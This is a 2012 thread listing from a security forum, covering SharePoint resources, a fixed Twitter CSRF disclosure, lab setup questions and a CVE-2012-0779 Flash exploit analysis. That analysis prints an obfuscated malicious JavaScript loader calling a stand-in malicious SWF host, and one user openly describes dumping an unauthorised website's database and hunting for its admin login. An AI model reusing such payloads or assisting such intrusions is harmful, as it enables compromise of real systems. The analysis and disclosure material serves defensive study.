Garage4hackers Forum

Research Resources for MS SharePoint

amolnaik4 — Fri, 18 May 2012 06:55:25 GMT

This page contains research notes on Microsoft�s SharePoint MOSS and WSS.

Link:
https://www.owasp.org/index.php/Rese...int_%28MOSS%29

About Admin

hazard74 — Thu, 17 May 2012 05:38:00 GMT

Hi all,

Im a new comer :D in this community, btw I want to ask something that always bother me. If you know about this please answer it
1. I hacking some website but after I make a long searching & dump the website database I just cant get the admin password, It is mean that some website dont store the password and username in the website database?

2. It's is true that some website dont have the admin login page? I already seaching it with 6k dork of admin page but it just dont have it, but I scan the website I found the FTP port is open, it is the admin of the website enter the database using FTP? or other method? o.0

I give you and example website that look like what im talking: xxxx Note: This website has Admin password but I just cant enter their database using that password.

Thanks, If you know about this please tell me.

Hi

hazard74 — Thu, 17 May 2012 05:36:15 GMT

Hi all im new here, hope I can learn with you guys ^__^

CHeers

Help required in decoding suspicious URL

Immaturedevil — Wed, 16 May 2012 09:24:18 GMT

Hi Group,
Need your help on understanding and decoding these URLs that i have got from my proxy.These URLs seems to be obfuscated. Appreciate If anyone could help me in decoding these URLs.

sample of urls:

http://i-e-g-n-9-p-2-5-0-9-1-1-b-h-9...fo/VERSION.TXT
http://3-4-c-9-9-f-2-3-2-6-6-q-j-2-5...fo/VERSION.TXT
http://v-q-z-q-y-1-o-n-8-u-q-9-v-d-x...fo/VERSION.TXT
http://8-n-9-0-f-f-u-3-9-0-y-n-9-m-9...fo/VERSION.TXT
http://4-e-q-o-8-y-w-i-3-r-0-p-q-o-5...fo/VERSION.TXT
http://s-4-r-d-7-j-m-9-0-9-1-2-5-2-7...fo/VERSION.TXT

Regards

Twitter Wipe Address Book CSRF Vulnerability

karniv0re — Wed, 16 May 2012 09:09:57 GMT

I disclosed a CSRF vulnerability with Twitter, that could allow a malicious attacker to wipe the address book of an unsuspecting user. I reported the vulnerability in the beginning of March and they fixed it on the 22nd! I wouldn't want to comment on the process and internal business logic that they follow, but honestly that was a a pretty long period for them to come up with a fix.

Anyways, getting to the vulnerability, the issue was that a user could delete his own address book with a single click URL, which is alright as long as the user wishes to do so himself. However, with the server not verifying whether the request was sent by the user himself or was the user was tricked into sending the request, the application allowed an attacker to generate a request on behalf of a logged in user from the user's browser and perform the action (deletion of the address book).

The normal process would be as follows:
1. A user logs into mobile.twitter.com
2. If he wants to delete his address book, he would click on Delete Address Book under settings.
3. Upon clicking, a GET request is sent to "https://mobile.twitter.com/settings/wipe_addressbook"
4. A message is presented that the the user's contacts have been removed.

Attachment 363

An attacker could take advantage of the absence of any security tokens (CSRF tokens) that would allow the server to authenticate the request and setup a page (and host it on xyz.com/index.html) similar to the following:

An attacker could then be made to navigate to xyz.com/index.html (via email or some other means) and his address book would be deleted!

The form that would make the final request has now been protected with a 'authenticity_token' which is random and changes on every login and without which the request is not processed on the server. An attacker would need to know this value to attack the application via CSRF.

Attachment 364

This was my ticket to the Twitter Hall of Fame for Security researchers at Twitter / Security!

Attached Images

Portable Executable 101 � a windows executable walkthrough

amolnaik4 — Tue, 15 May 2012 04:01:07 GMT

This graphic (PDF JPG) is a walkthrough of a simple windows executable, that shows its dissected structure and explains how it�s loaded by the operating system.

Link:
PE101

AMol NAik

How to install metasploitable on virtual box?

skorpinok — Sat, 12 May 2012 16:15:49 GMT

Hello,
I would like to know how to install metasploitable on virtual box? iam using new version of virtual box which lacks add feature in virtual media manager,
please suggest me, thanks in advance.

Regards.

Performing Android malware analysis

prashant_uniyal — Fri, 11 May 2012 16:36:10 GMT

Just wrote a short article and related methodologies to analyze malicious Android applications. It can be read from the link below:

Performing Android malware analysis | Secfence Blog

CVE-2012-0779 - Flash Player Exploit

c0d3inj3cT — Fri, 11 May 2012 15:38:32 GMT

This is regarding a latest Flash Player Exploit which is being used in the wild, mostly being served to victims in the form of Word Documents.

A brief overview before we get to the good stuff:

A Word Document has the following malicious JavaScript embedded in it:

Code:

javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://example.com/malicious.swf?info=<48 Char Hash>&infosize=%3E%3C/embed%3E')))

This JavaScript can easily be located by viewing the strings of the Word Document. It is encoded but it should be easy to follow that it creates an embed tag as following:

Code:

&infosize=">

Apart from the above malicious JavaScript, you will also find a payload present inside the Word Document. The MZ and PE Signatures are XOR Encrypted using a Byte. It can be easily retrieved using OfficeMalScanner.

It will bruteforce the XOR Key and dump the embedded payload. You may find only 1 binary or even multiple binaries.

When you open the MS Word Document, it will connect to the URL mentioned in the SRC Attribute of the Embed tag and fetch a SWF File. This in turn will spray the Process Heap with shellcode and trigger the vulnerability in Flash Player, thereby redirecting the execution to shellcode sprayed over the heap.

This shellcode will locate the payload present inside the Word Document.

Now, let's focus on the SWF file. You can fetch a SWF File from Contagio here:

http://contagiodump.blogspot.in/2012...ld-uyghur.html

Thanks Mila :)

The SWF file is compressed as you can see from the magic bytes (CWS).

It is also encrypted using DoSWF version 5.0.3. This information can be found in the RDF Metadata of the decompressed SWF File.

The decompiled ActionScript is posted on Contagio. It's time to deep dive into the ActionScript.

Nmap O.S Detection Error

skorpinok — Thu, 10 May 2012 18:30:12 GMT

Hello,
When i run nmap O.S detection scan for windows xp within Pentest lab, i get this ' Too many fingerprints match this host to give specific OS details , i tried this in vmware workstation before it gave me same mesage , however the mac address seems right, i run backtrack 5r2/windows xp sp3 on virtual box. my network configuration: NAT & HOST ONLY for Windows XP & Backtrack 5R2.please suggest me how to solve this ? Thanks in advance.

scan details:

nmap -O 192.168.56.103

Starting Nmap 5.61TEST4 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-05-05 23:33 GST
Nmap scan report for 192.168.56.103
Host is up (0.00042s latency).
All 1000 scanned ports on 192.168.56.103 are filtered
MAC Address: 08:00:27:C9:67:41 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Regards.

Web Application Hackers Toolchain

amolnaik4 — Thu, 10 May 2012 06:29:39 GMT

THis is a nice presentation by Jhaddix on how tool chaining can be useful in better application mapping.

Take a look:
https://docs.google.com/open?id=0B15...QwZTliM2VhYmQ4

Cheers,
AMol NAik

Pwning a Spammer's Keylogger

abhaythehero — Wed, 09 May 2012 07:28:05 GMT

Here is a very good read about how a researcher caught a keylogger and analyzed it upto the point of
discovering the spammer's server and his personal details :cool: >>

Pwning a Spammer's Keylogger - SpiderLabs Anterior

Google T-shirt :D

[s] — Tue, 08 May 2012 04:42:31 GMT

Security teams of Google have donated me shirts with corporate logo... proofs of my findings.
I would like to thank Google Security team, who have helped me to get shirt, I'm grateful for your efforts! ... :)

Thanks to My g4h Team :) who always support me

Attachment 361

Attached Images

Python-based malware attack targets Macs. Windows PCs also under fire

neo — Tue, 08 May 2012 03:49:37 GMT

Experts at SophosLabs have identified a new malware attack that is targeting both Mac and Windows computers, exploiting the infamous Java security vulnerability that allowed the Flashback botnet to commandeer 600,000 Macs.
.................
......................
..........................
The downloaded programs will then install further malicious code - downloading the Troj/FlsplyBD-A backdoor Trojan on Windows computers, and decrypting a Python script called update.py (extracted from install_flash_player.py) on Mac OS X.
.......................
...........................

READ Full Story

Network VAPT

[s] — Mon, 07 May 2012 13:27:38 GMT

If any one interested to do Network VAPT (Serious Project) then please PM me your Mobile number . Further information i will reply you in PM.

Thanks

Sandeep